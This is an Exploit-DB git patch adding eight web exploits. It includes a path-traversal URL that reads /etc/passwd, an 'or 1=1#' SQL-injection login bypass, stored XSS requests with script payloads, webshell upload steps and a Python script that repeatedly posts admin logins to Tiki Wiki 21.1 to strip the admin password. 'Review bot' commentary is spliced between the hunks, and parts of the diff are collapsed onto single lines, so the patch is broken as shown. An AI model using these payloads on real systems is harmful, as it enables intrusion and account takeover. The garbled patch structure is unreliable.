From 1539c20e48e08fbd2ec030b5d072b9ffe8e8d48c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 22 Oct 2020 05:02:10 +0000
Subject: [PATCH] DB: 2020-10-22 8 changes to exploits/shellcodes
Hrsale 2.0.0 - Local File Inclusion
School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC
School Faculty Scheduling System 1.0 - Authentication Bypass POC
GOautodial 4.0 - Authenticated Shell Upload
Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting
Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting
Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
---
 exploits/php/webapps/48920.txt | 15 ++++++
 exploits/php/webapps/48921.txt | 43 ++++++++++++++++
 exploits/php/webapps/48922.txt | 31 ++++++++++++
 exploits/php/webapps/48923.txt | 17 +++++++
 exploits/php/webapps/48924.txt | 85 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/48925.txt | 47 ++++++++++++++++++
 exploits/php/webapps/48926.txt | 44 +++++++++++++++++
 exploits/php/webapps/48927.py | 90 ++++++++++++++++++++++++++++++++++
 files_exploits.csv | 8 +++
 9 files changed, 380 insertions(+)
 create mode 100644 exploits/php/webapps/48920.txt
 create mode 100644 exploits/php/webapps/48921.txt
 create mode 100644 exploits/php/webapps/48922.txt
 create mode 100644 exploits/php/webapps/48923.txt
 create mode 100644 exploits/php/webapps/48924.txt
 create mode 100644 exploits/php/webapps/48925.txt
 create mode 100644 exploits/php/webapps/48926.txt
 create mode 100755 exploits/php/webapps/48927.py
diff --git a/exploits/php/webapps/48920.txt b/exploits/php/webapps/48920.txt
new file mode 100644
index 000000000..5c233471c
--- /dev/null
+++ b/exploits/php/webapps/48920.txt 
@@ -0,0 +1,15 @@
+# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
+# Date: 10/21/2020
+# Exploit Author: Sosecure
+# Vendor Homepage: https://hrsale.com/index.php
+# Version: version 2.0.0
+
+Description:
+This exploit allow you to download any readable file from server with out permission and login session.
+
+Payload :
+ https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
+POC:
+
+ 1. Access to HRsale application and browse to download path with payload
+ 2. Get /etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/48921.txt b/exploits/php/webapps/48921.txt
new file mode 100644
index 000000000..06c34fcda
--- /dev/null
+++ b/exploits/php/webapps/48921.txt 
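Review bot: The title `Hrsale 2.0.0 - Local File Inclusion` does not state that the issue is reachable without a session, although the description says it works "with out permission and login session"; the index marks authentication state in titles (see `(Authenticated)` on 48919 in files_exploits.csv), so `Hrsale 2.0.0 - Local File Inclusion (Unauthenticated)` would be clearer. `# Version: version 2.0.0` repeats the word, and the header lacks the `# Software Link:` field that the other advisories in this commit carry. The advisory identifies the sink (`filename` on `/download?type=files`) but gives no remediation; one line noting that the handler should resolve the requested name inside the intended download directory and reject anything that escapes it would help readers triaging the report.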
@@ -0,0 +1,43 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses + +Step 2: use payload in Course and Description field + +Malicious Request + +POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793 +Content-Length: 478 +Origin: http://localhost +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re + +-----------------------------168636252127671582243354784793 +Content-Disposition: form-data; name="id" + + +-----------------------------168636252127671582243354784793 +Content-Disposition: form-data; name="course" + + +-----------------------------168636252127671582243354784793 +Content-Disposition: form-data; name="description" + + +-----------------------------168636252127671582243354784793-- + +Step 3: Cookie will be reflected each time someone visits the Course List section. \ No newline at end of file diff --git a/exploits/php/webapps/48922.txt b/exploits/php/webapps/48922.txt new file mode 100644 index 000000000..37ac58d4b --- /dev/null +++ b/exploits/php/webapps/48922.txt 
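Review bot: The `course` and `description` multipart parts of the request are empty, so the stored-XSS payload that Step 2 tells the reader to use is not actually in the advisory — most likely the angle-bracket payload was stripped on paste; encode it the way 48925 and 48926 do (`%3Cscript%3E...`) so it survives rendering. Step 3's `Cookie will be reflected` likewise presumes a specific payload that appears nowhere in the file and should describe the observable result of the payload actually given. The request goes to `/admin/ajax.php?action=save_course` with an admin `PHPSESSID`, so the title should carry `(Authenticated)` like 48919 in the index; the same applies to 48924, 48925 and 48926, whose first step is logging in with admin privileges. `Content-Length: 478` also cannot match the body as shown once the two values are empty.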
@@ -0,0 +1,31 @@ +# Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass +# Date: 21/10/2020 +# Exploit Author: Jyotsna Adhana +# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + +Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin + +Step 2: use payload jyot' or 1=1# in user and password field + +Malicious Request + +POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 55 +Origin: http://localhost +Connection: close +Referer: http://localhost/schoolFSS/scheduling/admin/login.php +Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re + +username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23 + +Step 3: You will be logged in as admin. \ No newline at end of file diff --git a/exploits/php/webapps/48923.txt b/exploits/php/webapps/48923.txt new file mode 100644 index 000000000..44f1fc50a --- /dev/null +++ b/exploits/php/webapps/48923.txt 
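Review bot: The advisory names only the effect, not the root cause: the `jyot' or 1=1#` value in `username` and `password` can only bypass the login at `ajax.php?action=login` if those values are concatenated into the SQL query, so this is a SQL injection in the login handler and the title or description should say so (the index entry additionally carries a stray `POC` suffix). The `Cookie: PHPSESSID=...` header from a pre-existing session is not a prerequisite for an unauthenticated bypass and could be dropped so it does not read as one. A one-line remediation — bind the login parameters with a prepared statement and verify the password hash in application code rather than inside the query — would make the entry useful to readers assessing the application.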
@@ -0,0 +1,17 @@ +# Exploit Title: GOautodial 4.0 - Authenticated Shell Upload +# Author: Balzabu +# Discovery Date: 07-23-2020 +# Vendor Homepage: https://goautodial.org/ +# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html +# Tested Version: 4.0 (Last relase as of today) +# Tested on OS: CentOS 7 + +# STEPS TO REPRODUCE: + +1 - Log in as an agent +2 - Write a new message to user goadmin with random subject and text +3 - Attach your webshell to the message +4 - Access your shell at +https://www.foo.com/uploads/year/month/shellname.php ( Example: +https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php ) +5 - Priv esc and enjoy ... :-) \ No newline at end of file diff --git a/exploits/php/webapps/48924.txt b/exploits/php/webapps/48924.txt new file mode 100644 index 000000000..3b75d932c --- /dev/null +++ b/exploits/php/webapps/48924.txt 
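Review bot: The header fields (`# Author`, `# Discovery Date`, `# Tested Version`) do not follow the template the other advisories in this commit use (`# Exploit Author`, `# Date`, `# Version`), and `Last relase` is a typo. Step 3 `Attach your webshell to the message` does not identify the component at fault — which attachment handler stores the file under `/uploads/` without validating it — so a reader cannot tell whether a later vendor change addresses it. Step 5 `Priv esc and enjoy ... :-)` is not a reproduction step; either state the impact (the OS account the web server executes uploaded files under) or drop it. `# Software Link` points at an ISO image rather than the project source, which makes confirming the affected version harder.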
@@ -0,0 +1,85 @@ +# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name) +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 2, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + + +# Vulnerability Details +# Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function. +# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected. + +#Steps: + + 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) + + 2. Click "Product" + + 3. Click "Action" in any categories name row + + 4. Click Edit, then Product Info (tab) + + 5. In "Product Name" field enter XSS + + 6. Click save changes + + 7. Any page on the webapp expecting that 'Product Name' will trigger the XSS. 
+ + + +POST /stock/php_action/editProduct.php HTTP/1.1 +Host: 192.168.222.132 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/product.php +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477 +Content-Length: 938 +DNT: 1 +Connection: close +Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 + + +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editProductName" + + + +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editQuantity" + + +9 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editRate" + + + +1200 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editBrandName" + + +12 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editCategoryName" + + + +7 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="editProductStatus" + + + +1 +-----------------------------147762840819880874581057152477 +Content-Disposition: form-data; name="productId" + + +8 +-----------------------------147762840819880874581057152477-- \ No newline at end of file diff --git a/exploits/php/webapps/48925.txt b/exploits/php/webapps/48925.txt new file mode 100644 index 000000000..adb213327 --- /dev/null +++ b/exploits/php/webapps/48925.txt 
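Review bot: Step 3 reads `Click "Action" in any categories name row`, copied from the Categories advisory; for this file it should be `Click "Action" in any product name row`. The `editProductName` part of the request has an empty value, so unlike 48925 and 48926 the request as printed does not carry the payload Step 5 refers to (probably stripped on paste); percent- or HTML-encode it as those two files do. `Content-Length: 938` then cannot match the body shown, and the several blank lines inside the multipart body make the request invalid as printed.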
@@ -0,0 +1,47 @@ +# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name) +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 2, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + + +# Vulnerability Details +# Description A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function. +# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected. + +#Steps: + + 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) + + 2. Click "Category" + + 3. Click "Action" in any categories name row + + 4. Click Edit + + 5. In "Categories Name" field enter XSS + + 6. Click save changes + + 7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS. + +POST /stock/php_action/editCategories.php HTTP/1.1 +Host: 192.168.222.132 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/categories.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 102 +DNT: 1 +Connection: close +Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 + + + + +editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9 \ No newline at end of file diff --git a/exploits/php/webapps/48926.txt b/exploits/php/webapps/48926.txt new file mode 100644 index 000000000..4e45f1f03 --- /dev/null +++ b/exploits/php/webapps/48926.txt 
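Review bot: `# Description` says the vulnerability is in `the edit brand function`, but the request goes to `/stock/php_action/editCategories.php` and the steps click `Category` — the sentence was copied from 48926 and should read `the edit categories function`. The three blank lines between the header block and `editCategoriesName=...` also make the request invalid as printed, since HTTP allows exactly one empty line before the body; 48926 gets this right.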
@@ -0,0 +1,44 @@ +# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name) +# Exploit Author: Adeeb Shah (@hyd3sec) +# Date: August 2, 2020 +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html +# Version: 1.0 +# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4 + + +# Vulnerability Details +# Description A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function. +# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected. + +#Steps: + + 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit) + + 2. Click "Brand" + + 3. Click "Action" in any brand name row + + 4. Click Edit + + 5. In "Brand Name" field enter XSS + + 6. Click save changes + + 7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS. + +POST /stock/php_action/editBrand.php HTTP/1.1 +Host: 192.168.222.132 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.222.132/stock/brand.php +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 78 +DNT: 1 +Connection: close +Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8 + +editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14 \ No newline at end of file diff --git a/exploits/php/webapps/48927.py b/exploits/php/webapps/48927.py new file mode 100755 index 000000000..64ec94583 --- /dev/null +++ b/exploits/php/webapps/48927.py 
@@ -0,0 +1,90 @@ +# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass +# Date: 01.08.2020 (1st August 2020) +# Exploit Author: Maximilian Barz aka. Silky +# Vendor Homepage: tiki.org +# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip +# Version: 21.1 +# Tested on: Kali Linux 5.7.0-kali1-amd64 + +#!/usr/bin/env/python3 +import requests +import json +import lxml.html +import sys + +banner = ''' + +████████ ██ ██  ██ ██ ██  ██ ██ ██  ██ ██  ██████  ██  ██  +   ██    ██ ██  ██  ██ ██  ██ ██ ██  ██  ██       ██ ███  ███  + ██  ██ █████   ██ ██  █  ██ ██ █████   ██  █████   ██   ██  + ██  ██ ██  ██  ██ ██ ███ ██ ██ ██  ██  ██  ██      ██  ██  + ██  ██ ██  ██ ██  ███ ███  ██ ██  ██ ██  ███████  ██ ██ ██  +                                                             + + █████  ██  ██ ████████ ██  ██ ███████ ███  ██ ████████ ██  ██████  █████  ████████ ██  ██████  ███  ██  ██████  ██  ██ ██████  █████  ███████ ███████  +██   ██ ██  ██    ██    ██  ██ ██      ████  ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ████  ██  ██   ██  ██  ██  ██   ██ ██   ██ ██      ██       +███████ ██  ██  ██  ███████ █████  ██ ██  ██  ██  ██ ██  ███████  ██  ██ ██  ██ ██ ██  ██  ██████    ████   ██████  ███████ ███████ ███████  +██   ██ ██  ██  ██  ██   ██ ██     ██  ██ ██  ██  ██ ██  ██   ██  ██  ██ ██  ██ ██  ██ ██  ██   ██   ██   ██      ██   ██      ██      ██  +██  ██  ██████   ██  ██  ██ ███████ ██   ████  ██  ██  ██████ ██  ██  ██  ██  ██████  ██   ████   ██████   ██  ██  ██  ██ ███████ ███████  +                                                                                                                                             +Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337 +''' + + + + +def main(): + if(len(sys.argv) < 2): + print(banner) + print("Usage: %s " % sys.argv[0]) + print("Eg: %s 1.2.3.4 " % sys.argv[0]) + return + + + rhost = sys.argv[1] + url = 
"http://"+rhost+"/tiki/tiki-login.php" + + session = requests.Session() + + def get_ticket(): + r = requests.get(url) + login_page = r.text.encode('utf-8') + html = lxml.html.fromstring(login_page) + auth = html.xpath('//input[@name="ticket"]/@value') + + return str(auth)[2:-2] + + def get_cookie(): + session.get(url) + return session.cookies.get_dict() + + + cookie = get_cookie() + ticket = get_ticket() + + payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'} + headers = { + 'Host': rhost, + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzrhost, deflate', + 'Referer': 'http://'+rhost+'/tiki/tiki-login.php', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '125', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0', + } + + + for i in range(60): + r = session.post(url, payload, headers) + if("Account requires administrator approval." in r.text): + print("Admin Password got removed.") + print("Use BurpSuite to login into admin without a password ") + + + +if(__name__ == '__main__'): + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ba10c71d9..ab5e87ad1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -40738,6 +40738,14 @@ id,file,description,date,author,type,platform,port
 48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java,
 48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,
+48920,exploits/php/webapps/48920.txt,"Hrsale 2.0.0 - Local File Inclusion",2020-10-21,Sosecure,webapps,php,
+48921,exploits/php/webapps/48921.txt,"School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC",2020-10-21,"Jyotsna Adhana",webapps,php,
+48922,exploits/php/webapps/48922.txt,"School Faculty Scheduling System 1.0 - Authentication Bypass POC",2020-10-21,"Jyotsna Adhana",webapps,php,
+48923,exploits/php/webapps/48923.txt,"GOautodial 4.0 - Authenticated Shell Upload",2020-10-21,Balzabu,webapps,php,
+48924,exploits/php/webapps/48924.txt,"Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private 
Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,